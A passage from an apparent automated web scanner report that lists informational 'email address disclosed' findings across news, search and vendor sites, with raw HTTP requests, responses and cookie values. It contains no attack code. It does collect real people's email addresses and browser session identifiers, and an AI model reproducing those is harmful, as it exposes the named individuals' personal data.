User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.27.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.8.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:44:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 34876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<a href="mailto:joed@bostonherald.com">joed@bostonherald.com</a>
...[SNIP]...
<a href="mailto:joed@bostonherald.com">joed@bostonherald.com</a>
...[SNIP]...

20.5. http://bostonherald.com/track/inside_track/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /track/inside_track/view.bg?articleid=1366225&srvc=track&position=2 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.32.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.10.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:46:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 54573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://ogp.me/ns#" xmln
...[SNIP]...
<a href="mailto:trackgals@bostonherald.com">
...[SNIP]...

20.6. http://bostonherald.com/track/inside_track/view/20110907sox_with_heels/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /track/inside_track/view/20110907sox_with_heels/

Issue detail

The following email address was disclosed in the response:

Request

GET /track/inside_track/view/20110907sox_with_heels/ HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/inside_track/view.bg?articleid=1366225&srvc=track&position=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; bhpopup=on; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1358113657.1316021626.1316021626.1316239316.2; __utmb=1.11.10.1316239316; __utmc=1; __utmz=1.1316239316.2.2.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/; tmq=kvqD%3DT

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:48:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://ogp.me/ns#" xmln
...[SNIP]...
<a href="mailto:trackgals@bostonherald.com">
...[SNIP]...

20.7. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /epaper/Services/HomePageHandler.ashx

Issue detail

The following email address was disclosed in the response:

Request

GET /epaper/Services/HomePageHandler.ashx?host=bostonheraldnie.newspaperdirect.com&type=toppictures&datepos=7&language=en&count=20&personalization=0&format=json&callback=HomePageManager.Pictures.DataManager.onDataLoaded&swf=true HTTP/1.1
Host: bostonheraldnie.newspaperdirect.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx?date=17.9.2011&width=1087
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AProfile=l/dlCd2JUFoJvDZBu7A3D1ctGjY=; psid=283487331; homepage_settings_4=20_5_15_6_15_6_15_6_15_6_15_6_30_5_5_5_5_22_11_16_11_11_6_8_1_15_6; __utma=29240111.1007682055.1316239560.1316239560.1316239560.1; __utmb=29240111.1.10.1316239560; __utmc=29240111; __utmz=29240111.1316239560.1.1.utmcsr=bostonherald.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/national/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 17 Sep 2011 01:52:09 GMT
Last-Modified: Sat, 17 Sep 2011 01:42:09 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
wc: 2
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:42:09 GMT
Content-Length: 5924

HomePageManager.Pictures.DataManager.onDataLoaded([{id:"47a9b2b0-91be-400a-8f04-6330867a2c04",key:"2abXk7wkLUHesN7z0Gy4qg==",width:718,fpscale:10,type:"pic",article:{id:"e8459750-9218-41e4-8a6d-5bdc7a
...[SNIP]...
ddb8ac2a408",key:"SwhOjcVCv14BrXvCHQPFaQ==",width:235,fpscale:10,type:"pic",article:{id:"88103383-b07b-4c0f-bddb-e79e2fc06613",page:61,title:"Pats fans arrival on tap",rank:0,posts_count:0,byline:"... james.lazar@bostonherald.com",copyright:"",abstract:"Oh, Tommy Boy, like we needed any encouragement.\r\n...Yeah, start drinking early,... was the message Patriots superman Tom Brady gave fans coming to Sunday...s home opener at
...[SNIP]...

20.8. http://cache2-scripts.pressdisplay.com/res/services/ResourceManagerHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache2-scripts.pressdisplay.com
Path:   /res/services/ResourceManagerHandler.ashx

Issue detail

The following email address was disclosed in the response:

Request

GET /res/services/ResourceManagerHandler.ashx?output=json&type=all&ver=375&host=bostonheraldnie.newspaperdirect.com&timestamp=634478640699300000&callback=ResourceManager.onJsonLoaded&caching=1 HTTP/1.1
Host: cache2-scripts.pressdisplay.com
Proxy-Connection: keep-alive
Referer: http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: public
Content-Type: text/javascript; charset=utf-8
Date: Sat, 17 Sep 2011 01:40:51 GMT
Expires: Sat, 17 Dec 2011 02:40:51 GMT
Last-Modified: Thu, 15 Sep 2011 01:04:34 GMT
Server: ECS (sjo/522D)
Vary: Accept-Encoding
wc: 1
wc: 1
X-Cache: HIT
X-Powered-By: ASP.NET
Content-Length: 31315

window.JSONTooltips=[{id:"controlpanel",tooltips:[{id:"cpButUp",title:"Click here to scroll up the list"},{id:"cpButDown",title:"Click here to scroll down the list"},{id:"cpNewspapers",title:"Select t
...[SNIP]...
age",value:"Sorry, but the device\'s registration has become corrupt. Please remove and re-install the application from the App Store. Please contact us should you continue to experience any problems: iphonesupport@newspaperdirect.com"},{name:"DeliveryQueue.InvalidActivationNumberParam",value:"Invalid \'activation-number\' parameter"},{name:"Calendar.Mon",value:"Mon"},{name:"Calendar.Monday",value:"Monday"},{name:"Calendar.Tue",val
...[SNIP]...

20.9. http://duckduckgo.com/d.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /d.js

Issue detail

The following email address was disclosed in the response:

Request

GET /d.js?q=imap%20server&t=A&l=us-en&p=1&s=0 HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=imap+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:42:08 GMT
Content-Type: application/x-javascript; charset=UTF-8
Connection: keep-alive
Expires: Fri, 16 Sep 2011 19:42:07 GMT
Cache-Control: no-cache
Content-Length: 12210

da='<div class="ay"><div class="ayi"><a target="_blank" href="/y.js?u2=http%3A%2F%2F1127009.r.msn.com%2F%3Fld%3D4voksMmBQ9bUkZVcBCuJTRp18XXQvERW1jc5lNu0K3VFmso5HHDOgFDDA%2DEzFB9UY6t%2D%2DjZnkes9yvwlsz
...[SNIP]...
</b> for home use Jan Stocker &lt;Jan.Stocker@t-online.de&gt; Abstract. Here you find a short instruction how to install an <b>
...[SNIP]...

20.10. http://dw1.s81c.com/developerworks/js/jquery/cluetip98/jquery.hoverIntent.minified.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dw1.s81c.com
Path:   /developerworks/js/jquery/cluetip98/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /developerworks/js/jquery/cluetip98/jquery.hoverIntent.minified.js HTTP/1.1
Host: dw1.s81c.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/tivoli/library/s-csscript/

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Mon, 16 Jun 2008 20:40:32 GMT
ETag: "46a90-649-a3837000"
Accept-Ranges: bytes
ntCoent-Length: 1609
Content-Type: application/x-javascript
Content-Length: 1609
Date: Fri, 16 Sep 2011 19:55:06 GMT
Connection: close
Vary: Accept-Encoding

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

20.11. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.cpanel.net
Path:   /f43/connection-imap-server-failed-96021.html

Issue detail

The following email address was disclosed in the response:

Request

GET /f43/connection-imap-server-failed-96021.html HTTP/1.1
Host: forums.cpanel.net
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=imap+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:42:54 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Set-Cookie: bb_lastactivity=0; expires=Sat, 15-Sep-2012 19:42:54 GMT; path=/; domain=.cpanel.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Set-Cookie: vbseo_loggedin=deleted; expires=Thu, 16-Sep-2010 19:42:53 GMT; path=/
Content-Length: 99145
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
rror-message-no-login-failed-25044.html" title="I'm getting the following message when I attempt to log into my imap account:

1 login travis+d51.us *****
1 NO LOGIN failed

I've also tried &quot;travis@d51.us&quot;, same message. This happens for all of the sub-accounts, but I can log into any of the main account email addresses.

It looks like...">
...[SNIP]...

20.12. http://freeradius.org/faq/cistron.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freeradius.org
Path:   /faq/cistron.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /faq/cistron.html HTTP/1.1
Host: freeradius.org
Proxy-Connection: keep-alive
Referer: http://www.radius.cistron.nl/faq/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74731205.2134826601.1316220336.1316220336.1316220336.1; __utmb=74731205; __utmc=74731205; __utmz=74731205.1316220336.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:47:56 GMT
Server: Apache/2.2.8 (Ubuntu) mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Tue, 12 Jul 2011 19:09:47 GMT
ETag: "8740b1-9c81-4a7e40b12b4c0"
Accept-Ranges: bytes
Content-Length: 40065
Content-Type: text/html

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<HTML>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Perl">
   <met
...[SNIP]...
<A HREF="mailto:cistron-radius@lists.cistron.nl">cistron-radius@lists.cistron.nl</A>
...[SNIP]...
<A HREF="mailto:cistron-radius-request@lists.cistron.nl">cistron-radius-request@lists.cistron.nl</A>
...[SNIP]...
<A HREF="mailto:freeradius-users-request@lists.cistron.nl">freeradius-users-request@lists.cistron.nl</A>
...[SNIP]...
<A HREF="mailto:freeradius-devel-request@lists.cistron.nl">freeradius-devel-request@lists.cistron.nl</A>
...[SNIP]...
<A HREF="mailto:7pcrpn$qi$1@defiant.cistron.net">7pcrpn$qi$1@defiant.cistron.net</A>
...[SNIP]...

20.13. http://info.desktone.com/cloudhosted.virtual.desktop.free.trial.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.desktone.com
Path:   /cloudhosted.virtual.desktop.free.trial.html

Issue detail

The following email address was disclosed in the response:

Request

GET /cloudhosted.virtual.desktop.free.trial.html HTTP/1.1
Host: info.desktone.com
Proxy-Connection: keep-alive
Referer: http://www.desktone.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=LKZYVMS172.25.101.96CKMLJ; _mkto_trk=id:070-XIP-593&token:_mch-desktone.com-1316237201401-57160; __utma=172106422.940396514.1316237254.1316237254.1316237254.1; __utmb=172106422.1.10.1316237254; __utmc=172106422; __utmz=172106422.1316237254.1.1.utmcsr=info.desktone.com|utmccn=(referral)|utmcmd=referral|utmcct=/gaw.hosted.virtual.desktop.free.trial.html

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:31:18 GMT
Server: Apache
Vary: *,Accept-Encoding
Content-Length: 32115
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<a href="mailto:info@desktone.com">info@desktone.com</a>
...[SNIP]...

20.14. http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.desktone.com
Path:   /gaw.hosted.virtual.desktop.free.trial.html

Issue detail

The following email address was disclosed in the response:

Request

GET /gaw.hosted.virtual.desktop.free.trial.html?_kk=VDI&_kt=31d1a2bd-f653-42ac-b143-8a094cde83dc&gclid=COryhqeCo6sCFTEaQgodYAJH4g HTTP/1.1
Host: info.desktone.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop#pq=vdi&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=7&gs_id=w&xhr=t&q=vdi+hosting&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=vdi+hos&aq=0&aqi=g1g-v3&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:25:17 GMT
Server: Apache
Vary: *,Accept-Encoding
Content-Length: 31655
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<a href="mailto:info@desktone.com">info@desktone.com</a>
...[SNIP]...

20.15. http://info.mailtraq.com/wac  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.mailtraq.com
Path:   /wac

Issue detail

The following email address was disclosed in the response:

Request

GET /wac HTTP/1.1
Host: info.mailtraq.com
Proxy-Connection: keep-alive
Referer: http://www.mailtraq.com/30day
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1583%2Dreferer=http%3A%2F%2Fduckduckgo%2Ecom%2F%3Fq%3Dimap%2Bserver; ASPSESSIONIDQQSDCQTS=EJBHPKFBKMPAIDFPJELDBDIJ; __utma=248930399.1287691746.1316220202.1316220202.1316220202.1; __utmb=248930399.1.10.1316220202; __utmc=248930399; __utmz=248930399.1316220202.1.1.utmcsr=duckduckgo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; 1583-query=; 1583%2Duserid=%2D3830349; __utma=224494342.1969248356.1316220641.1316220641.1316220641.1; __utmc=224494342; __utmz=224494342.1316220641.1.1.utmcsr=info.mailtraq.com|utmccn=(referral)|utmcmd=referral|utmcct=/imap; __utmb=224494342.1.10.1316220641

Response

HTTP/1.1 200
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: 1583-query=; path=/; HttpOnly;
Set-Cookie: 1583%2Duserid=%2D3830349; expires=Fri, 14-Sep-2012 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:50:01 GMT
Connection: close

<html><head><title>Proxy Server in the Mailtraq email server</title><meta name="author" content="neatComponents" /><meta http-equiv="imagetoolbar" content="no" /><meta http-equiv="Content-Type" conten
...[SNIP]...
<a href="mailto:support@enstar.net">support@enstar.net</a>
...[SNIP]...

20.16. http://l.yimg.com/a/combo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /a/combo

Issue detail

The following email address was disclosed in the response:

Request

GET /a/combo?omg/js/omg-main-2.1.1.js&omg/js/menu-1.1.0.js&omg/js/deferloader-1.0.0.js HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:46:01 GMT
Cache-Control: public, max-age=315360000
Expires: Mon, 13 Sep 2021 21:46:01 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
Age: 11171
Content-Length: 86727
Proxy-Connection: keep-alive
Server: YTS/1.19.5

/* yahoo-dom-event
Copyright (c) 2007, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.4.1
*/
if(typeof YAHOO=="undefined"||
...[SNIP]...
<meaghan@yahoo-inc.com>
...[SNIP]...

20.17. http://livechat.iadvize.com/chat_init.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://livechat.iadvize.com
Path:   /chat_init.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /chat_init.js?sid=1821 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1821vvc=2; vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Fri, 16 Sep 2011 21:54:40 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
P3P: policyref="http://livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"
Set-Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62; expires=Sun, 15-Sep-2013 21:54:40 GMT; path=/
Set-Cookie: 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A2%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A2000%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2F%22%2C%22timeElapsed%22%3A0.03%7D; path=/
Expires: Mon, 22 Jan 1978 12:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 42095

if(typeof(iAdvize) !== 'object'){
   
if (/Safari/.test(navigator.userAgent) && !(/Chrome/.test(navigator.userAgent))) {
   var Sbody = document.getElementsByTagName( 'BODY' )[ 0 ];
   var newNode = docume
...[SNIP]...
315764257',libloaded:false,coreloaded:false,chatloaded:false,eventloaded:false,findopTM:null,attach:0,init_done:0,paused:0,opOffline:0,c2cOffline:1,opWatching:0,opBusy:0,on_call:0,virtualOP:0,opList:["idzmailjetc@iadvize.com","idzelie@iadvize.com"],phoneDisplayed:0,butMessage:false,mousetrack_interval:null,curlang:'en',chaturl:'http://livechat.iadvize.com/',static_url:'http://static.iadvize.com/',bosh_url:'http://www.iadvize.com/http-bind',web
...[SNIP]...
</a>.";
iAdvize.bosh_host = "iadvize.com";
iAdvize.watcher_jid = 'watch.999@iadvize.com';

iAdvize2.addDOMLoadEventFunc = function() {
   if (iAdvize.scriptLoaded === true
   || (iAdvize2.scriptLoaded === true)) {
       iAdvize.util.error('IADVIZE SCRIPT ALREADY LOADED');
       return;
   }

   iAdv
...[SNIP]...

20.18. http://mi.adinterax.com/customer/yahoohouse/4/SapientTest/Yahoo_IM/.ob/IM_425x600.flv.hi.video.mp4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mi.adinterax.com
Path:   /customer/yahoohouse/4/SapientTest/Yahoo_IM/.ob/IM_425x600.flv.hi.video.mp4

Issue detail

The following email address was disclosed in the response:

Request

GET /customer/yahoohouse/4/SapientTest/Yahoo_IM/.ob/IM_425x600.flv.hi.video.mp4?q=1309502921 HTTP/1.1
Host: mi.adinterax.com
Proxy-Connection: keep-alive
Referer: http://mi.adinterax.com/customer/yahoohouse/4/SapientTest/Yahoo_IM/.ob/YAHOO_143_B2C_Mail_IM_PushDown_954x250_Expanded_AdIntrex.swf?adxq=1312545223
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@2@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:32 GMT
Expires: Sun, 11 Dec 2011 23:29:27 GMT
Last-Modified: Fri, 01 Jul 2011 06:48:38 GMT
Cache-Control: max-age=7776000
Content-Type: video/x-flv
Accept-Ranges: bytes
Server: Footprint Distributor V4.6
Content-Length: 1137365

... ftypisom....isomiso2avc1mp41..$.moov...lmvhd.....3.7.3.7......:.................................................@..................................trak...\tkhd.....3.7.3.7..........:.............
...[SNIP]...
.K..t!........B.X..V..r....J.    t..:.M......t......-.3.9....XF...:.*..........$G.!.....]..b..|....;.u..,...!5....d..~..`|.n...2@.....T2.....T..$..o...W[..x.7...X4c........V@..$.bDs....0.|.M7...-NX.9.s..6u@gI.SY...G..Xf.3W`B..O.......%:.L.... ].=/I2...ir.......8I..`.@.............Xj.R.=..R..|..1.....{.T.....smq...j.8A@....fq.:P<...R+......S..(..I.o..x!..../.!..t...T0!t%}../..U.[By..c+..d...}1.B..z....36V|..
...[SNIP]...

20.19. http://vads.adbrite.com/vast/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vads.adbrite.com
Path:   /vast/adserver

Issue detail

